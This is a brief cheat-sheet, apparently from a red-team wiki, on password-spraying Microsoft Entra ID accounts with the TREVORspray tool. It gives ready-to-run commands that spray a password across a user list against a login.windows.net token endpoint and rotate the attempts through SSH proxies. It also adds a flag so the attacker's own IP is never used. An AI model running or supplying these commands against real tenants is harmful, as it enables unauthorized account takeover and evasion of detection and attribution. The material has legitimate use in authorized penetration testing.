Entra Password Spraying Tools¶
Trevorspray¶
https://github.com/blacklanternsecurity/TREVORspray
Password spray against `token_endpoint`
trevorspray -u <user_list> -p '<password>' --url https://login.windows.net/b439d764-cafe-babe-ac05-2e37deadbeef/oauth2/token
Password spray wtih round robin SSH proxy
trevorspray -u <user_list> -p '<password>' --ssh root@<ssh_server> root@<ssh_server> -k <ssh_key>
Add
-n
to only spray using proxies, not your current IP.